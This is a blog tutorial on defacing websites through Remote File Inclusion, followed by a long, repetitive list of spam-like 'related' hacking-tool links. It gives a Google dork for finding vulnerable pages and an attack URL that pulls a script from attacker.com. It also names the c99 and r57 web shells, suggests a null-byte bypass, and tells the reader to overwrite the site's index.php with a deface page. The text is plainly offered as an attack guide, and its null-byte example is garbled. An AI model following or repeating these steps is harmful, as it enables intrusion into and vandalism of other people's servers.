HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related news

  1. Pentest Tools Download
  2. Hack Tools
  3. Hacker Security Tools
  4. Pentest Tools Nmap
  5. Hack Tools For Mac
  6. Hack Tools For Windows
  7. Hacker Tools 2019
  8. Hack Tools Online
  9. Hacker Tools Windows
  10. Hacker Tool Kit
  11. Pentest Tools Review
  12. Hacking Tools Kit
  13. Hacking Tools For Mac
  14. Hacking Tools Download
  15. Pentest Tools Subdomain
  16. Ethical Hacker Tools
  17. Pentest Tools Subdomain
  18. Hak5 Tools
  19. Hack Tools For Pc
  20. Top Pentest Tools
  21. Hacker Techniques Tools And Incident Handling
  22. Pentest Tools Tcp Port Scanner
  23. Hacker Tools Apk Download
  24. Hacker Tool Kit
  25. Hacking Tools For Mac
  26. Hacking Tools For Windows Free Download
  27. Hacking Tools For Windows Free Download
  28. Pentest Tools Windows
  29. Hacking Tools Hardware
  30. Hacking Tools Hardware
  31. Pentest Tools List
  32. Hacking Tools Pc
  33. Hack Apps
  34. Pentest Tools For Ubuntu
  35. Hack Tool Apk
  36. Hack Tools 2019
  37. Pentest Tools Website Vulnerability
  38. Beginner Hacker Tools
  39. Hacker Tool Kit
  40. Github Hacking Tools
  41. Android Hack Tools Github
  42. Growth Hacker Tools
  43. Hack Tools For Mac
  44. Hacker Tools Linux
  45. Hacking Tools Download
  46. Pentest Reporting Tools
  47. Hacker Tools Hardware
  48. Hacker Tools For Mac
  49. Hacker Hardware Tools
  50. Top Pentest Tools
  51. Hack Rom Tools
  52. Black Hat Hacker Tools
  53. Hacker Tools List
  54. Hack Website Online Tool
  55. Pentest Tools Online
  56. Hacker Tools For Mac
  57. Wifi Hacker Tools For Windows
  58. Kik Hack Tools
  59. Hacking Tools For Windows Free Download
  60. Hacker Tools Windows
  61. Ethical Hacker Tools
  62. Tools 4 Hack
  63. Hacker Tools Windows
  64. Hack Tools For Windows
  65. How To Hack
  66. Pentest Tools Free
  67. Pentest Tools Download
  68. Hacking Tools Github
  69. Hacking Tools For Games
  70. Bluetooth Hacking Tools Kali
  71. Pentest Tools Android
  72. Pentest Box Tools Download
  73. Hacker Tools 2019
  74. Hacker Hardware Tools
  75. Hacker Tools Windows
  76. Pentest Tools Bluekeep
  77. Hacking Tools Hardware
  78. Hack Rom Tools
  79. Hack Tools For Windows
  80. Hack Tools
  81. Hacking Tools For Games
  82. Pentest Tools Port Scanner
  83. Hack Tools For Games
  84. Hacker Tools For Ios
  85. Game Hacking
  86. Hacker
  87. Hack Apps
  88. Pentest Tools Framework
  89. Nsa Hacker Tools
  90. Hacking Tools Online
  91. Beginner Hacker Tools
  92. Hacker Search Tools
  93. Underground Hacker Sites
  94. Beginner Hacker Tools
  95. How To Hack
  96. Hacking Tools For Beginners
  97. Hacking Tools Download
  98. Nsa Hacker Tools
  99. Tools 4 Hack
  100. Computer Hacker
  101. Hack Tools For Mac
  102. Hack Tools Online
  103. Pentest Box Tools Download
  104. Pentest Tools Windows
  105. Pentest Recon Tools
  106. Pentest Tools Alternative
  107. Hack Tools Github
  108. Hack Rom Tools
  109. Tools For Hacker
  110. Wifi Hacker Tools For Windows

No comments:

Post a Comment